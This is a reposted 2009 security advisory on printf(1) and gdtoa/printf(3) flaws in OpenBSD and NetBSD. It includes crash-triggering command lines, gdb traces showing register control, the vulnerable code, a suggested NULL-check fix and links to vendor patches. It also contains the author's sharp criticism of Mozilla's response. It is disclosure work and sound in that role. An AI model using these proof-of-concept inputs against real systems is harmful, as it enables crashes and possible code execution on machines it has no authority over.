Multiple BSD printf(1) and multiple dtoa/*printf(3) vulnerabilities

Published
Credit
Risk
2009.10.30
Maksymilian Arciemowicz
High
CWE
CVE
Local
Remote
N/A
N/A
Yes
Yes

[ Multiple BSD printf(1) and multiple dtoa/*printf(3) vulnerabilities ]

Author: Maksymilian Arciemowicz
Date:
- - Dis.: 29.06.2009
- - Pub.: 30.10.2009

We are going inform all vendors, about this problem

Affected Software (official):
- - OpenBSD 4.6
- - NetBSD 5.0.1
probably more (macosx, chrome, firefox,..)...

- --- 0.Description ---
printf(1) formats and prints its arguments, after the first, under control of the format. The format is a character string which contains three types of objects: plain characters, which are simply copied to standard output, character escape sequences which are converted and copied to the standard output, and format specifications, each of which causes printing of the next successive argument.

SYNOPSIS

printf format [arguments ...]


The printf(3) family of functions produces output according to a format as described below. The printf(3) and vprintf(3) functions write output to stdout, the standard output stream; fprintf(3) and vfprintf(3) write output to the given output stream; sprintf(3), snprintf(3), vsprintf(3), and vsnprintf(3) write to the character string str; and asprintf(3) and vasprintf(3) write to a dynamically allocated string that is stored in ret.

SYNOPSIS

int
printf(const char * restrict format, ...);

- --- 1. Multiple BSD printf(1) and multiple dtoa/*printf(3) vulnerabilities ---
The first problem exists in usr.bin/printf/printf.c. printf(1) in NetBSD and OpenBSD, have problem with a field width and precision. Difference between printf(1) and printf(3) is that the printf(1) has its own filter for formating fmt. To see acceptable tags, use manual "man 1 printf".

We can use char '*' in fmt, to declaring size in next arg.

example:
# printf %1.*f 1 1.2345
1.2

So, printf allow to use "*" in fmt.

- ---
...
fieldwidth = *fmt == '*' ? getint() : 0;
...
- ---

The problem is that the program does not verify the accuracy of fmt.

It is possible to use '*' a few times
=>
function getint() will be started a few times.

getint() returns the value allocated in memory ( function printf(3) ).

example:
# printf %1.**f 1 1.2345
/* long exec. */

precision here, will be taken from stack. This means that the precision is the number retrieved from the stack. Further addition of the '*' char, will moving the pointer of precision.

As a result, we try to appoint offset to control register esi and edi. But to do this, we need to change the fmt type of float to string .

example (string):
# printf %*********s 666
Memory fault (core dumped)

and we are in home. We need add "*********" to try control esi and edi reg.

# gdb -q printf
(no debugging symbols found)
(gdb) r "%*********s" 666
Starting program: /usr/bin/printf "%*********s" 666
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xbbba6a2a in __vfprintf_unlocked () from /usr/lib/libc.so.12
(gdb) i r
eax 0x0 0
ecx 0xffffffff -1
edx 0x0 0
ebx 0xbbbd5b38 -1145218248
esp 0xbfbfe320 0xbfbfe320
ebp 0xbfbfec08 0xbfbfec08
esi 0x29a 666
edi 0x29a 666

esi and edi are 666 (netbsd)

under openbsd, we have randomization, so it will be not so easy.

- ---
727 size = p ? (p - cp) : prec;
728 } else {
729 size_t len;
730
731 if ((len = strlen(cp)) > INT_MAX)
732 goto overflow;
733 size = (int)len;
734 }
735 sign = '\';
- ---

program will crash in 731 line (strlen(cp)).

Variable "cp" will be allocated in 666 addr in memory. So we can try manipulate of addr "cp" variable. That means that the shells are also affected (like /bin/sh /bin/csh) because printf is also used as a shell buit-in. We do not have accurate information, who uses a flawed implementation.

printf(1) should use "IEEE 1003.1-2001" standard.

Next problem with the printf(3) is very similar to "Multiple Vendors libc/gdtoa printf(3) Array Overrun" (SREASONRES:20090625) and concerns the implementation of gdtoa. We can try allocate a lot of memory, that malloc will generate crash. Issue has been detected in gdtoa from openbsd. NetBSD fix for (SREASONRES:20090625) is not affected and we thing that is better. Discrepancy theory, divided netbsd and openbsd.

example:
# printf %.1100000000f 1.1
Segmentation fault (core dumped)
...
(gdb) bt
#0 __Balloc_D2A (k=29) at /usr/src/lib/libc/gdtoa/misc.c:75
#1 0x00db1203 in __rv_alloc_D2A (i=550860376)
at /usr/src/lib/libc/gdtoa/dmisc.c:52
#2 0x00daeceb in __dtoa (d=1.1000000000000001, mode=3, ndigits=1100000000,
decpt=0xcfbcb634, sign=0x0, rve=0xcfbcb63c)
at /usr/src/lib/libc/gdtoa/dtoa.c:325
#3 0x00dad4e7 in vfprintf (fp=0x3c0035d8, fmt0=0xcfbcba5f "%.1100000000f",
ap=0xcfbcb85c "\224\f") at /usr/src/lib/libc/stdio/vfprintf.c:619
#4 0x00d7e5f1 in printf (fmt=0xcfbcba5f "%.1100000000f")
at /usr/src/lib/libc/stdio/printf.c:44
...
(gdb) i r
eax 0x0 0
ecx 0x20d57658 550860376
edx 0x0 0
ebx 0x20d57658 550860376
esp 0xcfbcb4a0 0xcfbcb4a0
ebp 0xcfbcb4b8 0xcfbcb4b8
esi 0x0 0
edi 0x1d 29
eip 0xdb16c3 0xdb16c3
...

code lib/libc/gdtoa/misc.c:
...
if (k <= Kmax && pmem_next - private_mem + len <= PRIVATE_mem) {
rv = (Bigint*)pmem_next;
pmem_next += len;
}
else
rv = (Bigint*)MALLOC(len*sizeof(double));
#endif
rv->k = k;
rv->maxwds = x;
}
...

if rv will be NULL, rv->k = k will generate crash. We sholud check returned value from MALLOC().

example:
else {
rv = (Bigint*)MALLOC(len*sizeof(double));
if (rv == NULL)
return (NULL);
}

Not only does such vulnerabilities, exists on BSD systems. This issue is very similar to:

http://googlechromereleases.blogspot.com/2009/09/stable-channel-update_30.html

This problem has been published in 25.06.2009 with PoC. Google has fixed this issue in 30.09.2009. However, very interesting false note has been released by Mozilla (27.10.2009).

http://www.mozilla.org/security/announce/2009/mfsa2009-59.html

Mozilla team since May, is not aware of the existence this issue (SREASONRES:20090625). Secunia has informed mozilla team. However, this bug qualify as a new issue with new CVE number. Why? We don't know. This is the same issue like (SREASONRES:20090625). Chrome has used original CVE but why mozilla have new CVE? Issue is the same. Secunia has confirmed it (29.10.2009).

We congratulate mozilla team rapid response, faulty fix and fake security note.

- --- 2. Fix ---
NetBSD printf(1):
http://cvsweb.de.netbsd.org/cgi-bin/cvsweb.cgi/src/usr.bin/printf/printf.c

OpenBSD printf(1):
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/printf/printf.c

OpenBSD gdtoa ( Oct 16 2009 UTC ):
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c

NetBSD gdtoa:
fix for SREASONRES:20090625 works well. Change only Kmax

- --- 3. Greets ---
martynas (fix), christos

- --- 4. Contact ---
Author: Maksymilian Arciemowicz

References:

http://googlechromereleases.blogspot.com/2009/09/stable-channel-update_30.html
http://www.mozilla.org/security/announce/2009/mfsa2009-59.html
http://cvsweb.de.netbsd.org/cgi-bin/cvsweb.cgi/src/usr.bin/printf/printf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/printf/printf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2016, cxsecurity.com